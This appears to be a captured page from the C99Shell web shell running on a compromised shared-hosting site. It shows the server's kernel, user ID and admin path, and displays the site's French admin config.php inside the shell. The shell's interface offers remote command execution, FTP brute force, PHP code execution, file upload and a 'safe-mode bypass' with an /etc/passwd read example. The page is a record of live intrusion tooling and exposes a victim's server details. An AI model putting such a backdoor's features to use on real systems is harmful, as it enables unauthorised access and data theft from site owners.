!C99Shell v. 1.0 pre-release build #16!

Software: Apache. PHP/5.4.45 

uname -a: Linux webm052.cluster007.gra.hosting.ovh.net 5.15.74-ovh-vps-grsec-zfs-classid #1 SMP Wed
Oct 26 09:50:47 UTC 2022 x86_64
 

uid=763961(ebenisteaz) gid=100(users) groups=100(users) 

Safe-mode: OFF (not secure)

/home/ebenisteaz/www/admin/   drwx---r-x
Free 0 B of 0 B (0%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.php (3.52 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once("header.php");
$theTable TABLE_CONFIG;
$thisPageContent "Configuration";
?>

</head>

<body>
    <!-- topbar ends -->
    <div class="container-fluid">
        <div class="row-fluid">
            <div id="content" class="span10">
                <!-- content starts -->
                <div>
                    <ul class="breadcrumb">
                        <li>
                            <a href="./index.php">Accueil</a> <span class="divider">/ <?php if (isset($thisPageContent) && $thisPageContent != "") {
    echo 
$thisPageContent "s";
?></span>
                        </li>
                        <div style="float:right"><a href="?logout">Déconnexion</a></div>
                    </ul>
                </div>

                <div class="row-fluid sortable">
                    <div class="box span12">
                        <div class="box-header well" data-original-title>
                            <h2><i class="icon-edit"></i> <?php if (isset($thisPageContent) && $thisPageContent != "") {
    echo 
$thisPageContent "";
?></h2>
                            <div class="span1" style="float:right"><a href="index.php" class="btn btn-success ajax-links" data-rel="tooltip" data-content="" title="Ajouter <?php echo $thisPageContent?>">Retour</a>        </div>
                        </div>
                    </div>
                    <div class="box-content">

                        <div class="progress progress-striped progress-success active" style="display:none">
                            <div class="bar" style="width: 0%;"></div>
                            <div id="statustxt">0%</div ></div>
                        <div id="htmlExampleTarget"></div>
                        <form class="form-horizontal main" id="usualValidate" action="includes/actionsdb.php<?php //echo $_SERVER['PHP_SELF']."?action=liste";  ?>"  method="post" enctype="multipart/form-data">
                            <fieldset>
                                <?php echo idRecord("id"$theTable); ?>
                                <input type="hidden" name="page" value="config" />
                                <input type="hidden" id="todo" name="todo" value="edit" />
                                <input type="hidden" name="thetable" value="<?php echo $theTable?>" />

<?php echo funcMultilangueChamp(0"Titre de site""nom_site_"$thisPageContent$theTable$langs"input-xlarge""required"); ?>

                                <div class="control-group">
                                    <label class="control-label" for="focusedInput">Email </label>
                                    <div class="controls">
                                        <input class="input-xlarge focused required email" id="email" name="email" type="text" placeholder="Adresse Email" <?php echo updateSimpleValue("email"$theTable); ?>>
                                    </div>
                                </div>



                                <div class="form-actions">
                                    <button type="submit" class="btn btn-primary validForm"  name="valider">Valider</button>
                                    <button type="reset" class="btn">Annuler</button>
                                </div>
                            </fieldset>
                        </form>

                    </div>
                </div><!--/span-->

            </div>

        </div><!--/#content.span10-->
    </div><!--/fluid-row-->

    <hr>

<?php require_once("footer.php"); ?>

</div>
<?php require_once("js.php"); ?>



</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | Generation time: 0.0245 ]--